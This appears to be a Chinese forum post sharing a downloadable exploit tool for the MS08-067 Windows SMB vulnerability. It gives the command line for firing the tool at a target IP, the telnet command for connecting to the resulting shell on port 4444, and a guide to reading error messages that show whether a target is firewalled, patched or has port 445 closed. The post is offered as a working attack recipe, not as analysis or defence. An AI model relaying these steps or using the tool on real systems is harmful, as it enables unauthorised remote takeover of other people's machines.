看最近几天ms08067挺火的，借着这个火气，过来分享一下这个漏洞的利用方法和全自动利用工具。
首先说下EMM发的Exp，

ms08067 漏洞利用工具.rar(24.85 KB)


使用方法非常简单，
cmd下直接运行MS08-067.exe IP即可。


若是提示：
SMB Connect OK!
Send Payload Over!
表明成功了。

接着就可以通过4444端口连接了
Telnet XXX.XXX.XXX.XXX 4444
 

若是提示：
SMB Connect OK!
RpcExceptionCode() = 1722
表明目标开了防火墙，溢出失败。


若是提示：
SMB Connect OK!
Maybe Patched!
表明目标已经打上补丁了。
 

若是提示：
Make SMB Connection error:1203
表明目标没有开启Server、Workstation、Computer Browser其中的任何一种服务。


若是提示：
Make SMB Connection error:53
表明目标没开445端口或本地网络问题。